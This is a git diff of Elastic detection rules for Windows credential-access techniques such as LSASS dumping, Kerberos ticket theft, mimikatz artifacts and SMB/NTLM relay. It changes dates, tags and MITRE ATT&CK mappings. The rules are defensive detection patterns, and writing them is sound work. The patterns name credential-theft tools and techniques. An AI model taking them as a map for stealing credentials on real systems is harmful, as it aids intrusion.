+[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" + [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" reference = "https://attack.mitre.org/techniques/T1187/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_kirbi_file.toml b/rules/windows/credential_access_kirbi_file.toml index 216c0590ebc..8f5e1c47d75 100644 --- a/rules/windows/credential_access_kirbi_file.toml +++ b/rules/windows/credential_access_kirbi_file.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -85,13 +85,19 @@ file where host.os.type == "windows" and event.type == "creation" and file.exten [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_ldap_attributes.toml b/rules/windows/credential_access_ldap_attributes.toml index e38375e2851..9cb9ff680a5 100644 --- a/rules/windows/credential_access_ldap_attributes.toml +++ b/rules/windows/credential_access_ldap_attributes.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -74,7 +74,17 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -108,18 +118,41 @@ any where host.os.type == "windows" and event.code == "4662" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/credential_access_lsass_loaded_susp_dll.toml b/rules/windows/credential_access_lsass_loaded_susp_dll.toml index 1dedfaed505..cb444a5b057 100644 --- a/rules/windows/credential_access_lsass_loaded_susp_dll.toml +++ b/rules/windows/credential_access_lsass_loaded_susp_dll.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/28" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -20,7 +20,15 @@ references = ["https://blog.xpnsec.com/exploring-mimikatz-part-2/", "https://git risk_score = 47 rule_id = "3a6001a0-0939-4bbe-86f4-47d8faeb7b97" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -134,18 +142,19 @@ The Local Security Authority Subsystem Service (LSASS) is crucial for managing s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique.subtechnique]] -id = "T1547.005" -name = "Security Support Provider" -reference = "https://attack.mitre.org/techniques/T1547/005/" +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_lsass_openprocess_api.toml b/rules/windows/credential_access_lsass_openprocess_api.toml index 16fd4867621..d6a78623f56 100644 --- a/rules/windows/credential_access_lsass_openprocess_api.toml +++ b/rules/windows/credential_access_lsass_openprocess_api.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/02" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [transform] [[transform.osquery]] @@ -105,7 +105,16 @@ references = ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomic risk_score = 47 rule_id = "ff4599cb-409f-4910-a239-52e4e6f532ff" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "esql" @@ -152,18 +161,31 @@ from logs-endpoint.events.api-*, logs-m365_defender.event-* metadata _id, _versi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/credential_access_machine_account_smb_relay.toml b/rules/windows/credential_access_machine_account_smb_relay.toml index 528c8f6fb7d..74eb4c912b9 100644 --- a/rules/windows/credential_access_machine_account_smb_relay.toml +++ b/rules/windows/credential_access_machine_account_smb_relay.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/16" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -82,18 +82,24 @@ file where host.os.type == "windows" and event.code == "5145" and endswith(user. [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" - [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml index 3605e41a057..cbc58475eaa 100644 --- a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml +++ b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -73,7 +73,19 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -84,31 +96,14 @@ file where host.os.type == "windows" and file.name : "mimilsa.log" and process.n [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.005" -name = "Security Support Provider" -reference = "https://attack.mitre.org/techniques/T1547/005/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_mimikatz_powershell_module.toml b/rules/windows/credential_access_mimikatz_powershell_module.toml index 2e5c4f9ded2..19d4c6879de 100644 --- a/rules/windows/credential_access_mimikatz_powershell_module.toml +++ b/rules/windows/credential_access_mimikatz_powershell_module.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -135,26 +135,22 @@ powershell.file.script_block_text:( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" -[[rule.threat.technique]] -id = "T1649" -name = "Steal or Forge Authentication Certificates" -reference = "https://attack.mitre.org/techniques/T1649/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_mod_wdigest_security_provider.toml b/rules/windows/credential_access_mod_wdigest_security_provider.toml index 20494bd67fa..d54be2d33fe 100644 --- a/rules/windows/credential_access_mod_wdigest_security_provider.toml +++ b/rules/windows/credential_access_mod_wdigest_security_provider.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -75,7 +75,17 @@ references = [ risk_score = 73 rule_id = "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", +] timestamp_override = "event.ingested" type = "eql" @@ -90,26 +100,19 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_moving_registry_hive_via_smb.toml b/rules/windows/credential_access_moving_registry_hive_via_smb.toml index b16d5bc3658..7dc0c02f2da 100644 --- a/rules/windows/credential_access_moving_registry_hive_via_smb.toml +++ b/rules/windows/credential_access_moving_registry_hive_via_smb.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/16" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -54,7 +54,15 @@ references = ["https://www.elastic.co/security-labs/detect-credential-access"] risk_score = 47 rule_id = "a4c7473a-5cb4-4bc1-9d06-e4a75adbc494" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Exfiltration", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -75,31 +83,36 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" reference = "https://attack.mitre.org/techniques/T1003/002/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + + [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml index aaa45725f4f..3f82b5ebbed 100644 --- a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml +++ b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/18" integration = ["endpoint", "m365_defender", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -151,36 +151,26 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.008" -name = "Network Provider DLL" -reference = "https://attack.mitre.org/techniques/T1556/008/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1556.008" -name = "Network Provider DLL" -reference = "https://attack.mitre.org/techniques/T1556/008/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/credential_access_posh_invoke_ninjacopy.toml b/rules/windows/credential_access_posh_invoke_ninjacopy.toml index 80fbae1a397..756fcb25eba 100644 --- a/rules/windows/credential_access_posh_invoke_ninjacopy.toml +++ b/rules/windows/credential_access_posh_invoke_ninjacopy.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/23" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -111,7 +111,14 @@ references = [ risk_score = 73 rule_id = "b8386923-b02c-4b94-986a-d223d9b01f88" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -135,12 +142,10 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" @@ -151,41 +156,43 @@ id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1006" -name = "Direct Volume Access" -reference = "https://attack.mitre.org/techniques/T1006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_kerb_ticket_dump.toml b/rules/windows/credential_access_posh_kerb_ticket_dump.toml index e73e3c3e9ab..8039fe58cfc 100644 --- a/rules/windows/credential_access_posh_kerb_ticket_dump.toml +++ b/rules/windows/credential_access_posh_kerb_ticket_dump.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/26" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -126,16 +126,40 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_minidump.toml b/rules/windows/credential_access_posh_minidump.toml index 6839473f031..f417da3fdb8 100644 --- a/rules/windows/credential_access_posh_minidump.toml +++ b/rules/windows/credential_access_posh_minidump.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/05" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -112,7 +112,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" @@ -123,39 +130,40 @@ event.category:process and host.os.type:windows and powershell.file.script_block [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_relay_tools.toml b/rules/windows/credential_access_posh_relay_tools.toml index bb431c9bf71..87be03b98ba 100644 --- a/rules/windows/credential_access_posh_relay_tools.toml +++ b/rules/windows/credential_access_posh_relay_tools.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/27" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -98,7 +98,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" @@ -118,57 +125,52 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" -[[rule.threat.technique.subtechnique]] -id = "T1557.001" -name = "LLMNR/NBT-NS Poisoning and SMB Relay" -reference = "https://attack.mitre.org/techniques/T1557/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_request_ticket.toml b/rules/windows/credential_access_posh_request_ticket.toml index 033602a029e..3c2c8435952 100644 --- a/rules/windows/credential_access_posh_request_ticket.toml +++ b/rules/windows/credential_access_posh_request_ticket.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/24" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -98,7 +98,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" @@ -116,39 +123,45 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_veeam_sql.toml b/rules/windows/credential_access_posh_veeam_sql.toml index df4b429b3b9..fa457a50f0f 100644 --- a/rules/windows/credential_access_posh_veeam_sql.toml +++ b/rules/windows/credential_access_posh_veeam_sql.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -140,16 +140,40 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml index c5883618cf0..bb46707c121 100644 --- a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml +++ b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -68,7 +68,21 @@ references = [ risk_score = 73 rule_id = "4682fd2c-cfae-47ed-a543-9bed37657aa6" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: 